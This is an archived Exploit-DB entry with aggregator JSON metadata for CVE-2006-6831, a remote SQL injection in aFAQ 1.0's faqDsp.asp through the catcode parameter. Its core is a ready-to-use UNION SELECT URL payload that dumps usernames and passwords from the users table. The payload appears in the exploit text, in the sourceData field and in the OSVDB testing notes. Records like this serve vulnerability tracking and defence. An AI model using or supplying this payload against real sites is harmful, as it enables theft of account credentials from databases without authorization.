ID EDB-ID:3031
Type exploitdb
Reporter ajann
Modified 2006-12-28T00:00:00
Description
aFAQ 1.0 (faqDsp.asp catcode) Remote SQL Injection Vulnerability. CVE-2006-6831. Webapps exploit for asp platform
*******************************************************************************
# Title : aFAQ 1.0 (catcode) Remote SQL Injection Vulnerability
# Author : ajann
# Contact : :(
# S.Page : http://www.alanward.net
# $$ : Free
*******************************************************************************
[[SQL]]]---------------------------------------------------------
http://[target]/[path]//faqDsp.asp?catcode=[SQL]
Example:
//faqDsp.asp?catcode=-1%20union%20select%20username,password,0,0,0,0,0,0,0,0,0,0,0,0%20from%20users
[[/SQL]]
"""""""""""""""""""""
# ajann,Turkey
# ...
# Im not Hacker!
# milw0rm.com [2006-12-28]
{"bulletinFamily": "exploit", "id": "EDB-ID:3031", "cvelist": ["CVE-2006-6831"], "modified": "2006-12-28T00:00:00", "lastseen": "2016-01-31T17:35:17", "edition": 1, "sourceData": "*******************************************************************************\n# Title : aFAQ 1.0 (catcode) Remote SQL Injection Vulnerability\n# Author : ajann\n# Contact : :(\n# S.Page : http://www.alanward.net\n# $$ : Free\n*******************************************************************************\n\n[[SQL]]]---------------------------------------------------------\n\nhttp://[target]/[path]//faqDsp.asp?catcode=[SQL]\n\nExample:\n\n//faqDsp.asp?catcode=-1%20union%20select%20username,password,0,0,0,0,0,0,0,0,0,0,0,0%20from%20users\n\n[[/SQL]]\n\n\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\n# ajann,Turkey\n# ...\n\n# Im not Hacker!\n\n# milw0rm.com [2006-12-28]\n", "published": "2006-12-28T00:00:00", "href": "https://www.exploit-db.com/exploits/3031/", "osvdbidlist": ["35832"], "reporter": "ajann", "hash": "ed91707b26ff897a2f92015380e71b68439105db3a57501463649d266b244844", "title": "aFAQ 1.0 faqDsp.asp catcode Remote SQL Injection Vulnerability", "history": [], "type": "exploitdb", "objectVersion": "1.0", "description": "aFAQ 1.0 (faqDsp.asp catcode) Remote SQL Injection Vulnerability. CVE-2006-6831. Webapps exploit for asp platform", "references": [], "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/3031/", "enchantments": {"vulnersScore": 8.3}}
{"result": {"cve": [{"id": "CVE-2006-6831", "type": "cve", "title": "CVE-2006-6831", "description": "SQL injection vulnerability in faqDsp.asp in aFAQ 1.0 allows remote attackers to execute arbitrary SQL commands via the catcode parameter.", "published": "2006-12-31T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-6831", "cvelist": ["CVE-2006-6831"], "lastseen": "2017-10-19T11:12:39"}], "osvdb": [{"id": "OSVDB:35832", "type": "osvdb", "title": "aFAQ faqDsp.asp catcode Variable SQL Injection", "description": "## Manual Testing Notes\nhttp://[target]/[path]//faqDsp.asp?catcode=-1%20union%20select%20username,password,0,0,0,0,0,0,0,0,0,0,0,0%20from%20users\n## References:\nISS X-Force ID: 31130\nGeneric Exploit URL: http://milw0rm.com/exploits/3031\n[CVE-2006-6831](https://vulners.com/cve/CVE-2006-6831)\n", "published": "2006-12-28T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://vulners.com/osvdb/OSVDB:35832", "cvelist": ["CVE-2006-6831"], "lastseen": "2017-04-28T13:20:31"}]}}
